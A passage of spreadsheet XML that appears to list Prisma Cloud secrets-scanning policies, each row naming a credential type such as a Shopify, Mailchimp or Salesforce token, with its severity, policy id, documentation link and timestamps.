          <t>27e72b60-3741-4aed-8854-470fffaac08f</t>
        </is>
      </c>
      <c r="AI590" t="inlineStr"/>
      <c r="AJ590" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK590" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" t="inlineStr"/>
      <c r="B591" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C591" s="2" t="inlineStr"/>
      <c r="D591" t="inlineStr"/>
      <c r="E591" t="inlineStr"/>
      <c r="F591" t="inlineStr"/>
      <c r="G591" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J591" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K591" t="inlineStr">
        <is>
          <t>Shopify Private App Token detected in code</t>
        </is>
      </c>
      <c r="L591" t="inlineStr"/>
      <c r="M591" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N591" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O591" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P591" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q591" t="inlineStr"/>
      <c r="R591" t="inlineStr"/>
      <c r="S591" t="inlineStr"/>
      <c r="T591" t="b">
        <v>0</v>
      </c>
      <c r="U591" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V591" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W591" t="inlineStr">
        <is>
          <t>Shopify Private App Token</t>
        </is>
      </c>
      <c r="X591" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-97</t>
        </is>
      </c>
      <c r="Y591" t="inlineStr"/>
      <c r="Z591" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA591" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB591" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC591" t="inlineStr">
        <is>
          <t>CKV_SECRET_97</t>
        </is>
      </c>
      <c r="AD591" t="b">
        <v>1</v>
      </c>
      <c r="AE591" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF591" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>d6506a40-a67f-4dfb-9813-e48fb307edd1</t>
        </is>
      </c>
      <c r="AI591" t="inlineStr"/>
      <c r="AJ591" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK591" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" t="inlineStr"/>
      <c r="B592" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C592" s="2" t="inlineStr"/>
      <c r="D592" t="inlineStr"/>
      <c r="E592" t="inlineStr"/>
      <c r="F592" t="inlineStr"/>
      <c r="G592" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J592" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K592" t="inlineStr">
        <is>
          <t>Mailchimp Access Key detected in code</t>
        </is>
      </c>
      <c r="L592" t="inlineStr"/>
      <c r="M592" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N592" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O592" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P592" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q592" t="inlineStr"/>
      <c r="R592" t="inlineStr"/>
      <c r="S592" t="inlineStr"/>
      <c r="T592" t="b">
        <v>0</v>
      </c>
      <c r="U592" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V592" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W592" t="inlineStr">
        <is>
          <t>Mailchimp Access Key</t>
        </is>
      </c>
      <c r="X592" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11</t>
        </is>
      </c>
      <c r="Y592" t="inlineStr"/>
      <c r="Z592" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA592" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB592" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC592" t="inlineStr">
        <is>
          <t>CKV_SECRET_11</t>
        </is>
      </c>
      <c r="AD592" t="b">
        <v>1</v>
      </c>
      <c r="AE592" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF592" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>73ce6819-d605-4d89-a126-69eb2cd099f1</t>
        </is>
      </c>
      <c r="AI592" t="inlineStr"/>
      <c r="AJ592" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK592" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" t="inlineStr"/>
      <c r="B593" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C593" s="2" t="inlineStr"/>
      <c r="D593" t="inlineStr"/>
      <c r="E593" t="inlineStr"/>
      <c r="F593" t="inlineStr"/>
      <c r="G593" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J593" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K593" t="inlineStr">
        <is>
          <t>Salesforce Refresh Token detected in code</t>
        </is>
      </c>
      <c r="L593" t="inlineStr"/>
      <c r="M593" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N593" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O593" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P593" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q593" t="inlineStr"/>
      <c r="R593" t="inlineStr"/>
      <c r="S593" t="inlineStr"/>
      <c r="T593" t="b">
        <v>0</v>
      </c>
      <c r="U593" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V593" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W593" t="inlineStr">
        <is>
          <t>Salesforce Refresh Token</t>
        </is>
      </c>
      <c r="X593" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-168</t>
        </is>
      </c>
      <c r="Y593" t="inlineStr"/>
      <c r="Z593" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA593" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB593" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC593" t="inlineStr">
        <is>
          <t>CKV_SECRET_168</t>
        </is>
      </c>
      <c r="AD593" t="b">
        <v>1</v>
      </c>
      <c r="AE593" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF593" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>9197c19b-d821-4783-a070-fd5e3f2ec35c</t>
        </is>
      </c>
      <c r="AI593" t="inlineStr"/>
      <c r="AJ593" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK593" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" t="inlineStr"/>
      <c r="B594" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C594" s="2" t="inlineStr"/>
      <c r="D594" t="inlineStr"/>
      <c r="E594" t="inlineStr"/>
      <c r="F594" t="inlineStr"/>
      <c r="G594" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J594" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K594" t="inlineStr">
        <is>
          <t>PagerDuty Authorization Token detected in code</t>
        </is>
      </c>
      <c r="L594" t="inlineStr"/>
      <c r="M594" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N594" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O594" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P594" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q594" t="inlineStr"/>
      <c r="R594" t="inlineStr"/>
      <c r="S594" t="inlineStr"/>
      <c r="T594" t="b">
        <v>0</v>
      </c>
      <c r="U594" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V594" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W594" t="inlineStr">
        <is>
          <t>PagerDuty Authorization Token</t>
        </is>
      </c>
      <c r="X594" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57</t>
        </is>
      </c>
      <c r="Y594" t="inlineStr"/>
      <c r="Z594" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA594" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB594" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC594" t="inlineStr">
        <is>
          <t>CKV_SECRET_57</t>
        </is>
      </c>
      <c r="AD594" t="b">
        <v>1</v>
      </c>
      <c r="AE594" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF594" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>e66683fb-cce5-4b61-8a20-03fadc90d390</t>
        </is>
      </c>
      <c r="AI594" t="inlineStr"/>
      <c r="AJ594" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK594" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" t="inlineStr"/>
      <c r="B595" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C595" s="2" t="inlineStr"/>
      <c r="D595" t="inlineStr"/>
      <c r="E595" t="inlineStr"/>
      <c r="F595" t="inlineStr"/>
      <c r="G595" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J595" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K595" t="inlineStr">
        <is>
          <t>JSON Web Token detected in code</t>
        </is>
      </c>
      <c r="L595" t="inlineStr"/>
      <c r="M595" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N595" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O595" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P595" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q595" t="inlineStr"/>
      <c r="R595" t="inlineStr"/>
      <c r="S595" t="inlineStr"/>
      <c r="T595" t="b">
        <v>0</v>
      </c>
      <c r="U595" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V595" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W595" t="inlineStr">
        <is>
          <t>JSON Web Token</t>
        </is>
      </c>
      <c r="X595" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9</t>
        </is>
      </c>
      <c r="Y595" t="inlineStr"/>
      <c r="Z595" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA595" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB595" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC595" t="inlineStr">
        <is>
          <t>CKV_SECRET_9</t>
        </is>
      </c>
      <c r="AD595" t="b">
        <v>1</v>
      </c>
      <c r="AE595" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF595" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>2d5ee856-a20a-4262-8c55-d60c09a33068</t>
        </is>
      </c>
      <c r="AI595" t="inlineStr"/>
      <c r="AJ595" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK595" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" t="inlineStr"/>
      <c r="B596" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C596" s="2" t="inlineStr"/>
      <c r="D596" t="inlineStr"/>
      <c r="E596" t="inlineStr"/>
      <c r="F596" t="inlineStr"/>
      <c r="G596" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J596" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K596" t="inlineStr">
        <is>
          <t>Bearer token detected in code</t>
        </is>
      </c>
      <c r="L596" t="inlineStr"/>
      <c r="M596" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N596" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O596" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P596" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q596" t="inlineStr"/>
      <c r="R596" t="inlineStr"/>
      <c r="S596" t="inlineStr"/>
      <c r="T596" t="b">
        <v>0</v>
      </c>
      <c r="U596" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V596" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W596" t="inlineStr">
        <is>
          <t>Bearer token</t>
        </is>
      </c>
      <c r="X596" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-192</t>
        </is>
      </c>
      <c r="Y596" t="inlineStr"/>
      <c r="Z596" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA596" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB596" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC596" t="inlineStr">
        <is>
          <t>CKV_SECRET_192</t>
        </is>
      </c>
      <c r="AD596" t="b">
        <v>1</v>
      </c>
      <c r="AE596" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF596" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>f68a0a08-ad1e-41a0-b030-2c242ebabb72</t>
        </is>
      </c>
      <c r="AI596" t="inlineStr"/>
      <c r="AJ596" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK596" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" t="inlineStr"/>
      <c r="B597" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C597" s="2" t="inlineStr"/>
      <c r="D597" t="inlineStr"/>
      <c r="E597" t="inlineStr"/>
      <c r="F597" t="inlineStr"/>
      <c r="G597" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J597" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K597" t="inlineStr">
        <is>
          <t>NuGet API Key detected in code</t>
        </is>
      </c>
      <c r="L597" t="inlineStr"/>
      <c r="M597" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N597" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O597" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P597" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q597" t="inlineStr"/>
      <c r="R597" t="inlineStr"/>
      <c r="S597" t="inlineStr"/>
      <c r="T597" t="b">
        <v>0</v>
      </c>
      <c r="U597" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V597" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W597" t="inlineStr">
        <is>
          <t>NuGet API Key</t>
        </is>
      </c>
      <c r="X597" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-99</t>
        </is>
      </c>
      <c r="Y597" t="inlineStr"/>
      <c r="Z597" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA597" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB597" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC597" t="inlineStr">
        <is>
          <t>CKV_SECRET_99</t>
        </is>
      </c>
      <c r="AD597" t="b">
        <v>1</v>
      </c>
      <c r="AE597" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF597" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>be7c0c91-98d8-430f-a573-d4e9ec301cdc</t>
        </is>
      </c>
      <c r="AI597" t="inlineStr"/>
      <c r="AJ597" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK597" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" t="inlineStr"/>
      <c r="B598" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C598" s="2" t="inlineStr"/>
      <c r="D598" t="inlineStr"/>
      <c r="E598" t="inlineStr"/>
      <c r="F598" t="inlineStr"/>
      <c r="G598" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J598" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K598" t="inlineStr">
        <is>
          <t>SoftLayer Credential detected in code</t>
        </is>
      </c>
      <c r="L598" t="inlineStr"/>
      <c r="M598" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N598" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O598" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P598" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q598" t="inlineStr"/>
      <c r="R598" t="inlineStr"/>
      <c r="S598" t="inlineStr"/>
      <c r="T598" t="b">
        <v>0</v>
      </c>
      <c r="U598" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V598" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W598" t="inlineStr">
        <is>
          <t>SoftLayer Credentials</t>
        </is>
      </c>
      <c r="X598" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15</t>
        </is>
      </c>
      <c r="Y598" t="inlineStr"/>
      <c r="Z598" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA598" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB598" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC598" t="inlineStr">
        <is>
          <t>CKV_SECRET_15</t>
        </is>
      </c>
      <c r="AD598" t="b">
        <v>1</v>
      </c>
      <c r="AE598" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF598" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>66c63576-47c9-4ea7-9886-afc728739003</t>
        </is>
      </c>
      <c r="AI598" t="inlineStr"/>
      <c r="AJ598" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK598" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" t="inlineStr"/>
      <c r="B599" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C599" s="2" t="inlineStr"/>
      <c r="D599" t="inlineStr"/>
      <c r="E599" t="inlineStr"/>
      <c r="F599" t="inlineStr"/>
      <c r="G599" t="b">
        <v>1</v>
      </c>
      <c r="H5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599" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J599" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K599" t="inlineStr">
        <is>
          <t>Typeform API Token detected in code</t>
        </is>
      </c>
      <c r="L599" t="inlineStr"/>
      <c r="M599" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N599" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O599" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P599" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q599" t="inlineStr"/>
      <c r="R599" t="inlineStr"/>
      <c r="S599" t="inlineStr"/>
      <c r="T599" t="b">
        <v>0</v>
      </c>
      <c r="U599" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V599" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W599" t="inlineStr">
        <is>
          <t>Typeform API Token</t>
        </is>
      </c>
      <c r="X599" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70</t>
        </is>
      </c>
      <c r="Y599" t="inlineStr"/>
      <c r="Z599" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA599" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB599" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC599" t="inlineStr">
        <is>
          <t>CKV_SECRET_70</t>
        </is>
      </c>
      <c r="AD599" t="b">
        <v>1</v>
      </c>
      <c r="AE599" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF599" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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599" t="inlineStr">
        <is>
          <t>4d0f2321-6866-4fa9-b57c-1d7db2801acb</t>
        </is>
      </c>
      <c r="AI599" t="inlineStr"/>
      <c r="AJ599" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK599" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" t="inlineStr"/>
      <c r="B600" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C600" s="2" t="inlineStr"/>
      <c r="D600" t="inlineStr"/>
      <c r="E600" t="inlineStr"/>
      <c r="F600" t="inlineStr"/>
      <c r="G600" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J600" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K600" t="inlineStr">
        <is>
          <t>Shopify Generic App Token detected in code</t>
        </is>
      </c>
      <c r="L600" t="inlineStr"/>
      <c r="M600" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N600" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O600" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P600" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q600" t="inlineStr"/>
      <c r="R600" t="inlineStr"/>
      <c r="S600" t="inlineStr"/>
      <c r="T600" t="b">
        <v>0</v>
      </c>
      <c r="U600" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V600" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W600" t="inlineStr">
        <is>
          <t>Shopify Generic App Token</t>
        </is>
      </c>
      <c r="X600" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-90</t>
        </is>
      </c>
      <c r="Y600" t="inlineStr"/>
      <c r="Z600" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA600" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB600" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC600" t="inlineStr">
        <is>
          <t>CKV_SECRET_90</t>
        </is>
      </c>
      <c r="AD600" t="b">
        <v>1</v>
      </c>
      <c r="AE600" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF600" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>cd2b51b9-dc89-4f0e-ab2d-51dc70457740</t>
        </is>
      </c>
      <c r="AI600" t="inlineStr"/>
      <c r="AJ600" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK600" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" t="inlineStr"/>
      <c r="B601" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C601" s="2" t="inlineStr"/>
      <c r="D601" t="inlineStr"/>
      <c r="E601" t="inlineStr"/>
      <c r="F601" t="inlineStr"/>
      <c r="G601" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J601" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K601" t="inlineStr">
        <is>
          <t>Crates API Token detected in code</t>
        </is>
      </c>
      <c r="L601" t="inlineStr"/>
      <c r="M601" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N601" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O601" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P601" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q601" t="inlineStr"/>
      <c r="R601" t="inlineStr"/>
      <c r="S601" t="inlineStr"/>
      <c r="T601" t="b">
        <v>0</v>
      </c>
      <c r="U601" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V601" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W601" t="inlineStr">
        <is>
          <t>Crates API Token</t>
        </is>
      </c>
      <c r="X601" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-96</t>
        </is>
      </c>
      <c r="Y601" t="inlineStr"/>
      <c r="Z601" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
